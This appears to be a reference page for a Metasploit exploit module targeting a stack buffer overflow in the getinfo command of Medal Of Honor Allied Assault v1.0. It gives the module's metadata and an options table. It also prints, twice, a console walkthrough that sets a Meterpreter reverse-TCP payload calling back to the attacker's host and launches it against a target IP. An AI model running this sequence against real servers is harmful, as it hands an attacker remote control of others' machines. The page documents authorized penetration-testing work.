Medal Of Honor Allied Assault getinfo Stack Buffer Overflow
This module exploits a stack based buffer overflow in the getinfo command of Medal Of Honor Allied Assault.
Exploit Rank
- Great
Exploit Authors
- Jacopo Cervini < >
Vulnerability References
Exploit Targets
- 0 - Medal Of Honor Allied Assault v 1.0 Universal (default)
Exploit Development
Similar Exploit Modules
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/games/mohaa_getinfo
msf exploit(mohaa_getinfo) > show payloads
msf exploit(mohaa_getinfo) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(mohaa_getinfo) > set LHOST [MY IP ADDRESS]
msf exploit(mohaa_getinfo) > set RHOST [TARGET IP]
msf exploit(mohaa_getinfo) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/games/mohaa_getinfo
msf exploit(mohaa_getinfo) > show payloads
msf exploit(mohaa_getinfo) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(mohaa_getinfo) > set LHOST [MY IP ADDRESS]
msf exploit(mohaa_getinfo) > set RHOST [TARGET IP]
msf exploit(mohaa_getinfo) > exploit
Exploit Module Options
| RHOST | The target address |
| RPORT | The target port (default: 12203) |
| CHOST | The local client address |
| CPORT | The local client port |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
